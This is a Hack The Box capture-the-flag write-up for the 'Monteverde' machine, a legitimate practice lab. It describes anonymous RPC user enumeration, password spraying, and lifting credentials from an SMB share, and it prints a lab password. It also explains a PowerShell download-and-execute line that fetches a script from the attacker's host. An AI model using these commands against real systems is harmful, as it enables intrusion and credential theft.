🐭Monteverde
https://app.hackthebox.com/machines/Monteverde
So let's start by a quick nmap:
Could not connect via SMB shares
So tried RPC on port 445:
rpcclient: This is a command-line tool used to execute client-side operations on a remote system that supports RPC. It allows users to interact with services that utilize RPC for communication.-U "": This parameter specifies the username to use for authentication. In this case, an empty string""is used, which might indicate that the command is trying to connect anonymously or using a null session.-N: This flag is used to indicate that no password should be prompted for, which typically implies anonymous authentication.10.129.69.81: This is the IP address of the remote system to which the command is attempting to connect.querydispinfo: This appears to be a command or operation being requested from the remote system. It could be querying display information, such as details about the available shared resources or services.
So we found the name of some of the users and their account name
a good way to go would be to check if the users use their name as passwords for their account
So let's try to put all the usernames in a word list and spray using crackmapexec
cool we got a match
Now let's use smbmap to tell me what shares there are and what I have access to in a cleaned up manner:
smbmap: This is a command-line tool used to enumerate and interact with shares on SMB servers. It allows users to discover accessible shares, permissions, and other information available on SMB-enabled systems.-H 10.129.69.81: This parameter specifies the target host or IP address (10.129.69.81) of the SMB server that thesmbmaptool will interact with. This is the remote system you want to analyze.
after some enumeration we see some interesting files:
To grab it using smbclient ->
smbclient: This is the command-line tool used to access files and services on SMB/CIFS servers.-U SABatchJobs: This parameter specifies the username (SABatchJobs) to be used for authentication when connecting to the SMB/CIFS server.//10.10.10.172/users$: This is the Uniform Naming Convention (UNC) path to the shared resource on the server (10.10.10.172). Theusers$represents a hidden share namedusers. The double slashes//indicate the beginning of a UNC path.SABatchJobs: This is the password corresponding to the username provided with the-Uflag. It's used for authentication purposes.-c 'get mhope/azure.xml azure.xml': This part of the command specifies a subcommand to be executed after connecting to the SMB/CIFS server. In this case, it's executing thegetcommand to retrieve a file namedazure.xmlfrom themhopedirectory on the server'susers$share. The file will be downloaded to the local system and saved asazure.xml.
Or another way of doing it:
in the XML file, there are credentials:
since the credentials are in mhope directory, it's a high prob it's his credentials ->
You can check that with crackmapexec
crackmapexec: This is a penetration testing tool that is used for assessing the security of networks by identifying and exploiting vulnerabilities. It's specifically designed for enumerating and exploiting Windows hosts on a network.winrm: This indicates that the operation being performed bycrackmapexecpertains to WinRM, which is a management protocol used for remote management of Windows systems over HTTP(S). WinRM allows for remote execution of PowerShell commands and scripts, as well as other management tasks.10.129.69.81: This is the IP address of the target system where the WinRM service is running.crackmapexecwill attempt to connect to this system to perform enumeration or exploitation.-u mhope: This flag specifies the username (mhope) to be used for authentication when connecting to the WinRM service on the target system.-p '4n0therD4y@n0th3r$': This flag specifies the password (4n0therD4y@n0th3r$) corresponding to the username provided with the-uflag. It's used for authentication purposes.
We also get the indication that winrm works for this account so let's go:
In the box description, we see that they talk about Azure Active Directory and there was a share "azure uploads"
When used without additional parameters, "net user mhope" displays detailed information about the specified user account, such as the account's full name, description, whether the account is active or disabled, when the account was created, and when the account's password was last set
We see that mhope is part of the azure admins group
after quick enumeration we also see that there are a lot of azure related files:
nice blog about azure red teaming:
We see this :
on my local machine i'll put this in an "azurePentest.ps1" file:
and go fetch it like that:
or another way is to download it and executing it right away:
iex: This is the alias for theInvoke-Expressioncmdlet in PowerShell. It's used to execute commands or scripts represented as strings.(new-object net.webclient): This creates a new instance of theSystem.Net.WebClientclass in .NET. This class provides methods for downloading data from the internet..downloadstring('http://10.10.14.94:6969/shell1.ps1'): This calls theDownloadStringmethod of theWebClientobject created in the previous step. It downloads the contents of the specified URL (http://10.10.14.94:6969/shell1.ps1) as a string.
Combining these components, the entire command can be interpreted as follows:
Create a new instance of the
WebClientclass.Use this
WebClientobject to download the contents of the PowerShell script (shell1.ps1) from the specified URL (http://10.10.14.94:6969/shell1.ps1).Execute the downloaded script using the
Invoke-Expressioncmdlet (iex)
Script kiddie type stuff, but we get some credentials. Let's hop on WinRM:
🕺pageWinRMLast updated
